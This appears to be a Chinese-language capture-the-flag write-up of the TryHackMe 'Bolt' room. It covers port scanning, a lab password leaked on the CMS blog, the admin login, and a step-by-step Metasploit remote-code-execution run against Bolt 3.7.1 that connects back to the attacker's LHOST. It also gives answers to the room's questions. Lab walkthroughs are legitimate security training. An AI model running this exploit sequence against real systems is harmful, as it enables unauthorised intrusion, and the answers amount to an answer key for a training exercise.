[Day8] THM Bolt

今天再来试玩一个 Try Hack Me 上面的简单题目，攻打一个 CMS (Content Management System ) 的服务。

• 网址 : https://tryhackme.com/room/bolt
• IP : 10.10.51.13

扫 Port

• 如同先前的起手式一样
  • 先透过 rustscan 扫描，再透过 nmap 扫描
• rustscan -a 10.10.51.13
  • 
  • 发现有开 3 个 Port
    • 22
    • 80
    • 8000
• nmap -A -p22,80,8000 10.10.51.13
  • 

观察网页

• 它有开两个网页的 Port
  • 80
    • 80 port 看起来是一个预设的 apache 页面
    • 
  • 8080
    • 8080 port 看起来是一个 Bolt 的页面
    • 
• Question : What port number has a web server with a CMS running?
  • 8000
• Question : What is the username we can find in the CMS?
  • 在这个 Blog 上，我们可以看到使用者的帐号叫做 bolt
• 我们也可以发现在 Po 文的地方找到
  • 
  • 它很 87 的把自己的密码 Po 在上面
    • 不要觉得这在真实世界上不可能发生
    • 真实世界上真的很常出现这种事 XD
• Question : What is the password we can find for the username?
  • boltadmin123

进入後台

• 网路上找到 Bolt 後台网址
  • http://10.10.51.13:8000/bolt/login
  • 
  • 并成功地使用帐密进行登入
• Question : What version of the CMS is installed on the server? (Ex: Name 1.1.1)
  • Bolt 3.7.1
  • 上一张截图最下面有写
  • 而这个版本在网路上搜寻，可以找到有 RCE 的漏洞

Exploit

• 今天来使用 Metasploit 进行攻击
  • 首先输入 msfconsole 进入 metasploit
• 我们来搜寻
  • search bolt
    • 
    • 找到了编号为 0 的 RCE 的漏洞
• 使用 编号 0 的漏洞
  • use 0
• 观察需要设定的参数
  • show options
  • 会回传 PASSWORD , USERNAME , RHOSTS , LHOST 等必填栏位
• 设定密码
  • set PASSWORD password
• 设定各种参数
  • set USERNAME bolt
  • set RHOSTS 10.10.51.13
  • set LHOST tun0
    • tun0 代表我使用网卡代号 tun0 的 IP (VPN)
• 再次观察参数
  • show options
  • 
  • 确认该填的东西都填好了!!
• 执行脚本
  • exploit
    • 
• 成功 RCE
  • 可以执行任意指令，例如 ls
  • 
• 也能顺利取得 flag
  • 

心得

这个题目告诉了我们，网页不一定开在 80 / 443 Port；我们可以透过 CMS 上面的蛛丝马迹寻找帐号跟密码的线索；不要耍白ㄘ的把密码给 Po 到网路上。再来就是可以透过网路上的资源寻找後台、版本等；待蒐集完备後，就可以开始寻找攻击方式。今天与昨天的内容都提醒了我们，当软件有重大更新时，一定要马上的做更新，以避免攻击。